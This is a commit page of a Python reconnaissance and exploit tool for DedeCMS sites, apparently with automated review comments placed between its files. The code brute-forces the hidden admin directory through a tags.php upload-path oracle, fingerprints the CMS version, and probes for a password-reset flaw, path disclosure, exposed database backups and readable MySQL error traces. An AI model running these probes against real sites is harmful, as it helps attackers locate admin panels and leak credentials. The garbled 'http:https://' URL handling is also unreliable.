forked from lengjibo/dedecmscan
Commit
Showing
7 changed files
with
258 additions
and
0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
import requests | ||
import itertools | ||
from termcolor import cprint | ||
|
||
class FindAdmin: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
def findadmin(self): | ||
try: | ||
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" | ||
back_dir = "" | ||
flag = 0 | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + "/tags.php" | ||
payload = '/dede' | ||
r = requests.get(url=url+payload) | ||
if r.status_code == 200: | ||
back_dir = url + payload | ||
else: | ||
data = { | ||
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif", | ||
"_FILES[mochazz][name]": 0, | ||
"_FILES[mochazz][size]": 0, | ||
"_FILES[mochazz][type]": "image/gif" | ||
} | ||
for num in range(1, 7): | ||
if flag: | ||
break | ||
for pre in itertools.permutations(characters, num): | ||
pre = ''.join(list(pre)) | ||
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre) | ||
r = requests.post(vulnurl, data=data) | ||
if "Upload filetype not allow !" not in r.text and r.status_code == 200: | ||
flag = 1 | ||
back_dir = pre | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
break | ||
else: | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
flag = 0 | ||
for i in range(30): | ||
if flag: | ||
break | ||
for ch in characters: | ||
if ch == characters[-1]: | ||
flag = 1 | ||
break | ||
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch) | ||
r = requests.post(url, data=data) | ||
if "Upload filetype not allow !" not in r.text and r.status_code == 200: | ||
back_dir += ch | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
break | ||
else: | ||
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" | ||
|
||
cprint("find dedeadmin is :" + back_dir,"red") | ||
except: | ||
return False |
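Review bot: The bare `except:` that wraps the whole body of `findadmin` turns every failure (connection error, timeout, a plain coding error) into a silent `return False`, while the success path falls off the end and returns `None`, so a caller cannot tell "nothing found" from "the check never ran". None of the `requests.get`/`requests.post` calls passes a `timeout`, and the `itertools.permutations(characters, num)` loop for `num` up to 6 puts no cap on the number of POSTs it sends, so one stalled host blocks the run indefinitely. I would write `requests.post(vulnurl, data=data, timeout=10)`, catch `except requests.RequestException as exc:` and print the error, and give the loop an explicit request budget. The same bare `except:` and missing `timeout` recur in `version`, `checkpass`, `checkpath`, `shortpath` and `checktrace` in the other files of this commit.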
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,72 @@ | ||
import requests | ||
from termcolor import cprint | ||
import re | ||
|
||
|
||
class GetVersion: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
|
||
|
||
def version(self): | ||
|
||
def cheakver(arg): | ||
ver_histroy = {'20080307': 'v3 or v4 or v5', | ||
'20080324': 'v5 above', | ||
'20080807': '5.1 or 5.2', | ||
'20081009': 'v5.1sp', | ||
'20081218': '5.1sp', | ||
'20090810': '5.5', | ||
'20090912': '5.5', | ||
'20100803': '5.6', | ||
'20101021': '5.3', | ||
'20111111': 'v5.7 or v5.6 or v5.5', | ||
'20111205': '5.7.18', | ||
'20111209': '5.6', | ||
'20120430': '5.7SP or 5.7 or 5.6', | ||
'20120621': '5.7SP1 or 5.7 or 5.6', | ||
'20120709': '5.6', | ||
'20121030': '5.7SP1 or 5.7', | ||
'20121107': '5.7', | ||
'20130608': 'V5.6-Final', | ||
'20130922': 'V5.7SP1', | ||
'20140225': 'V5.6SP1', | ||
'20140725': 'V5.7SP1', | ||
'20150618': '5.7', | ||
'20180109': 'V5.7SP2' | ||
} | ||
ver_list = sorted(list(ver_histroy.keys()))#将键变成列表,并排序 | ||
ver_list.append(arg)#将参数加到末尾 | ||
sorted_ver_list = sorted(ver_list)#重新排序 | ||
return ver_histroy[ver_list[sorted_ver_list.index(arg) ]]#判断是否在其中,并返回其值 | ||
|
||
headers = { | ||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", | ||
"Content-Type":"application/x-www-form-urlencoded", | ||
"Accept-Encoding": "gzip, deflate" | ||
} | ||
payload = "/data/admin/ver.txt" | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + payload | ||
try: | ||
r = requests.get(url=vulnurl,headers=headers) | ||
if r.status_code == 200: | ||
m = re.search("^(\d+)$", r.text) | ||
if m: | ||
version = cheakver(m.group(1)) | ||
msg = "探测到dedecms版本:{} version:{}".format(r.text, version) | ||
cprint(msg, "red") | ||
except: | ||
return False | ||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
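Review bot: `cheakver` raises `KeyError` for any `ver.txt` date later than the last table key `20180109`: `sorted_ver_list.index(arg)` then equals the number of keys, `ver_list[...]` returns the appended `arg` itself, and the dictionary lookup fails, which the bare `except:` in `version` hides as `return False`. A `bisect` lookup over the sorted keys with an explicit fallback makes the boundary visible, e.g. `i = bisect.bisect_left(keys, arg)` followed by `return ver_histroy[keys[i]] if i < len(keys) else 'newer than 20180109'` (this needs `import bisect`). The pattern on the `re.search` line should be a raw string, `r"^(\d+)$"`, because `\d` in a plain literal is an invalid escape sequence that newer Python versions warn about. The inline comments in `cheakver` are in Chinese; an English comment stating that a date between two keys maps to the next later entry would document the intended rounding.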
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
# -*- coding: utf-8 -*- |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
import requests | ||
from termcolor import cprint | ||
|
||
class passwordres: | ||
|
||
def __init__(self,url): | ||
|
||
self.url = url | ||
|
||
def checkpass(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", | ||
"Content-Type": "application/x-www-form-urlencoded", | ||
"Accept-Encoding": "gzip, deflate" | ||
} | ||
payload = 'member/reg_new.php' | ||
|
||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + payload | ||
|
||
try: | ||
r = requests.get(url=vulnurl,headers=headers) | ||
|
||
if "系统关闭了会员功能" in r.text: | ||
return | ||
else: | ||
cprint("可能存在dede任意用户重置漏洞:https://www.t00ls.net/thread-43689-1-1.html","red") | ||
except: | ||
return False |
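Review bot: `checkpass` prints its warning for every response that lacks the string `系统关闭了会员功能` and never looks at `r.status_code`, so a 404 page, a redirect target or a site that is not DedeCMS at all is reported as a possible finding. The URL is built as `url + payload` with `payload = 'member/reg_new.php'` (no leading slash), and the trailing `/` is only appended inside the scheme branch; when `self.url` is used as given and has no trailing slash, the path is glued onto the host name and the request goes to a different host. I would require a positive signal, `if r.status_code == 200 and "系统关闭了会员功能" not in r.text:`, and build the URL with `urllib.parse.urljoin(url.rstrip('/') + '/', payload)`. The method returns `None` for both outcomes and `False` only on error; returning a boolean result would let callers act on it.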
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
import requests | ||
from termcolor import cprint | ||
import re | ||
|
||
class path: | ||
|
||
def __init__(self,url): | ||
|
||
self.url = url | ||
|
||
def checkpath(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
payloads = [ | ||
'member/inc/config_pay_yeepay.php', | ||
'member/inc/config_pay_tenpay.php', | ||
'member/inc/config_pay_nps.php ', | ||
'member/inc/config_pay_cbpayment.php ', | ||
'member/inc/config_pay_alipay.php', | ||
'include/downmix.inc.php' | ||
] | ||
try: | ||
|
||
for payload in payloads: | ||
vulnurl = url + payload | ||
r = requests.get(url=vulnurl,headers=headers) | ||
if r.status_code == 200: | ||
m = re.search('in <b>([^<]+)</b>', r.text) | ||
if m: | ||
cprint("dedecmd path:" + vulnurl,"red") | ||
|
||
except: | ||
return False |
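Review bot: Two entries in `payloads` end with a space, `'member/inc/config_pay_nps.php '` and `'member/inc/config_pay_cbpayment.php '`; the space becomes part of the request path, so those two checks most likely never reach the intended file, and the trailing spaces should be dropped. The regex `in <b>([^<]+)</b>` captures a value from the error output, but the message prints `vulnurl` and discards `m.group(1)`, and the label reads `dedecmd`, presumably a typo for `dedecms`. For whoever receives the report, the finding is PHP error text in the response body; turning off `display_errors` on the server is the usual remediation.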
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
import requests | ||
from termcolor import cprint | ||
|
||
|
||
class shortpath: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
def shortpath(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
payloads = ['/data/backupdata/dede_h~', '/data/backupdata/dede_m~', '/data/backupdata/dede_p~', | ||
'/data/backupdata/dede_a~', '/data/backupdata/dede_s~'] | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
try: | ||
for payload in payloads: | ||
for number in range(1, 5): | ||
testurl = url.strip() + payload + str(number) + ".txt" | ||
r = requests.get(url=testurl,headers=headers) | ||
html = r.text | ||
if r.status_code == 200 and ("admin" in html or "密码" in html): | ||
cprint("dede databak is vulnable" + testurl,"red") | ||
except: | ||
return False | ||
|
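Review bot: `shortpath` reads the complete response into `r.text` only to test for two substrings, so when a backup file really is exposed the whole dump, credentials included, is pulled into memory on the machine running the check. Requesting with `requests.get(url=testurl, headers=headers, stream=True)` and inspecting only the first block from `r.iter_content(4096)`, decoded with the response's encoding, is enough for the match and keeps the sensitive data off the scanner. The substring test (`"admin"` or `"密码"` with status 200) also matches custom error pages that answer 200, so a hit needs manual confirmation. The message concatenates `"dede databak is vulnable"` and `testurl` without a separator.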
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
import requests | ||
from termcolor import cprint | ||
|
||
|
||
class trace: | ||
|
||
def __init__(self,url): | ||
self.url = url | ||
|
||
def checktrace(self): | ||
headers = { | ||
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
} | ||
payload = "/data/mysql_error_trace.inc" | ||
if ':https://' not in self.url: | ||
self.url = 'http:https://' + self.url + '/' | ||
url = self.url | ||
vulnurl = url + payload | ||
|
||
try: | ||
r = requests.get(url=vulnurl,headers=headers) | ||
if r.status_code == 200 and r"<?php" in r.text(): | ||
cprint("mysql trace is vulnable:" + vulnurl,"red") | ||
except: | ||
return False |
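Review bot: `r.text()` in the condition calls a string: `text` is a property of the `requests` response, so the call raises `TypeError` whenever the status is 200, the bare `except:` swallows it, and `checktrace` returns `False` without ever printing a result. The condition should read `if r.status_code == 200 and "<?php" in r.text:` (the `r` prefix on the literal is not needed). `vulnurl` is `url + "/data/mysql_error_trace.inc"`, which yields a double slash when the scheme branch has already appended `/`. For the site owner a hit means the SQL error log is readable over HTTP; denying web access to the `data` directory is the usual fix.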